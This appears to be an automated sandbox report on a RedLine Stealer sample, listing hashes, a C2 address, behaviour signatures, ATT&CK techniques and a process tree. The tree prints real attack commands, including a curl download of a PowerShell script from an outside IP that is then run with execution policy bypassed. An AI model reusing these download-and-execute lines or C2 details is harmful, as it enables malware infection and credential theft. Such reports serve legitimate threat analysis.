Analysis

  • max time kernel
    140s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    15-12-2022 04:20

General

  • Target

    tmp.exe

  • Size

    6KB

  • MD5

    285cbd341de6e17b42f1663245a58346

  • SHA1

    5281aa0f428bca4b5eeafda1b7eefc5735490d09

  • SHA256

    55466ebc5b9c9e17e47e2af745c118001c1163eaa9aa945760f90b2af3f8362c

  • SHA512

    4a66b1409d84376228b4276dd13f0bd42aee0e935755faf01bde72c2b8a2d69da9addd55cf41a3c4a47ca06795f70ee6452976edc10de1b1ccea8705b3cd047d

  • SSDEEP

    96:7sfW3+7yyZLiS9co2FhRPr4SNkyfkkWFnU:7/22Fhx4SGQz

Malware Config

Extracted

Family

redline

Botnet

SPOOFER

C2

20.197.226.40:32619

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:520
    • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      "C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:936
    • C:\Users\Admin\AppData\Local\Temp\tmp.exe
      C:\Users\Admin\AppData\Local\Temp\tmp.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:336
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updeter.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1508
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1760
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            5⤵
              PID:1216
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1008
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1700
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1876
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.mediafire.com/file/qif3gi2emfmv5cg/password_is_eulen.rar/file
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1352
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:275457 /prefetch:2
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:108

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Collection

    Data from Local System

    2
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      61KB

      MD5

      fc4666cbca561e864e7fdf883a9e6661

      SHA1

      2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

      SHA256

      10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

      SHA512

      c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      008663ad290e308d53c048c406c09ff5

      SHA1

      e7bfb833e3c70db11ffa13d4529def881eb2bc0f

      SHA256

      460b97924900df9501b6438f1eafbd135488db52919c7ed98a7215a49377a82d

      SHA512

      a4bd68e5e888ecc981ad1bea0d7312bbd4f5ae54454bd38c02b094e0b71be701b55212391e17a5b9f6bcdade5a5f565abfe02c42ae3badfe7cf081ee82435eff

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      f5f2a41189a6445fe4ecb9c567ac35f8

      SHA1

      2489f4e25e482f92a1b1d2a54f1619586887872d

      SHA256

      3e2e3daef978976e79af8e5dd0b7f339deef77b2859b2f1691b1f5abcfbe5155

      SHA512

      3ea319d901f6c9fa19e24741689111c18a6112aa2a583442db20955f86a8d1860ef28eb7952476ab9c462e761b0753b419fce99b349ca04aae728df29dd72b24

    • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      Filesize

      9.7MB

      MD5

      0974f41ccfe913ecca0e02b69e2a48e2

      SHA1

      b96e82a039a2024a8c352b6332a582593628bfba

      SHA256

      7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

      SHA512

      60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

    • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      Filesize

      9.7MB

      MD5

      0974f41ccfe913ecca0e02b69e2a48e2

      SHA1

      b96e82a039a2024a8c352b6332a582593628bfba

      SHA256

      7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

      SHA512

      60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

    • C:\Users\Admin\AppData\Local\Temp\updeter.vbs
      Filesize

      112KB

      MD5

      8b50289dfca4b0f572536e3ff6b51b96

      SHA1

      8fac95861b2803dcae74709b08361c4e89e8ae86

      SHA256

      0b0c649fca400195a96031b16acc9b002d9556520c7e61f689967fd46eb058c8

      SHA512

      da5f11ebad71aaa8389f3c250ec06a54ff29b869bb738d6c61eaa7032b359bcfebfdbaa807b886aa02f8d15745f02b1162ef7774457a4911b7b9eb1a20f81acc

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\QM1BPBVB.txt
      Filesize

      601B

      MD5

      0833928ac38b26f45128a4312add6e89

      SHA1

      7df067c2bb20e24f1daced2df33f03e110ef3b34

      SHA256

      5da73cf6cfc96ca83b3e40c5c0f83c147363593120b1c9ed79adee132320b687

      SHA512

      69282411ccac3c35bc0c2201498cd352655e2d9e493b45ab4741de0c8f8192532ae1a8515f9327293b6ae7c57ed53d295b2e573acef4115c551db308d77803de

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      9926991605691237a40731389a7fc533

      SHA1

      aa4926b0f9fc56d7d42e29b3be1c35ba2a95bf96

      SHA256

      53253405c53937268d6f6cfc2e51d89f0b9725d667ba1f595fb639eba5723531

      SHA512

      66f188e32ba4f58445aad9c0051c46a215a1bd7e6f9c8b7755fdd6ba5362ddba0f6ec916cf55ebb624ecb0484594ce53ebc397e86e65313b14ea046add02ebb2

    • \Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      Filesize

      9.7MB

      MD5

      0974f41ccfe913ecca0e02b69e2a48e2

      SHA1

      b96e82a039a2024a8c352b6332a582593628bfba

      SHA256

      7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

      SHA512

      60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

    • memory/336-75-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

    • memory/336-67-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

    • memory/336-68-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

    • memory/336-70-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

    • memory/336-71-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

    • memory/336-72-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

    • memory/336-73-0x000000000041933E-mapping.dmp
    • memory/336-77-0x0000000000400000-0x000000000041E000-memory.dmp
      Filesize

      120KB

    • memory/520-61-0x000000006DED0000-0x000000006E47B000-memory.dmp
      Filesize

      5.7MB

    • memory/520-62-0x000000006DED0000-0x000000006E47B000-memory.dmp
      Filesize

      5.7MB

    • memory/520-58-0x0000000000000000-mapping.dmp
    • memory/520-60-0x000000006DED0000-0x000000006E47B000-memory.dmp
      Filesize

      5.7MB

    • memory/936-84-0x0000000140000000-0x00000001412A5000-memory.dmp
      Filesize

      18.6MB

    • memory/936-82-0x0000000140000000-0x00000001412A5000-memory.dmp
      Filesize

      18.6MB

    • memory/936-64-0x0000000000000000-mapping.dmp
    • memory/936-78-0x0000000140000000-0x00000001412A5000-memory.dmp
      Filesize

      18.6MB

    • memory/1008-90-0x0000000000000000-mapping.dmp
    • memory/1068-57-0x00000000004E0000-0x0000000000572000-memory.dmp
      Filesize

      584KB

    • memory/1068-55-0x0000000075A91000-0x0000000075A93000-memory.dmp
      Filesize

      8KB

    • memory/1068-56-0x0000000008EB0000-0x00000000098C0000-memory.dmp
      Filesize

      10.1MB

    • memory/1068-54-0x00000000002C0000-0x00000000002C8000-memory.dmp
      Filesize

      32KB

    • memory/1216-89-0x0000000000000000-mapping.dmp
    • memory/1508-85-0x0000000000000000-mapping.dmp
    • memory/1700-91-0x0000000000000000-mapping.dmp
    • memory/1760-88-0x0000000000000000-mapping.dmp
    • memory/1876-95-0x0000000073B50000-0x00000000740FB000-memory.dmp
      Filesize

      5.7MB

    • memory/1876-92-0x0000000000000000-mapping.dmp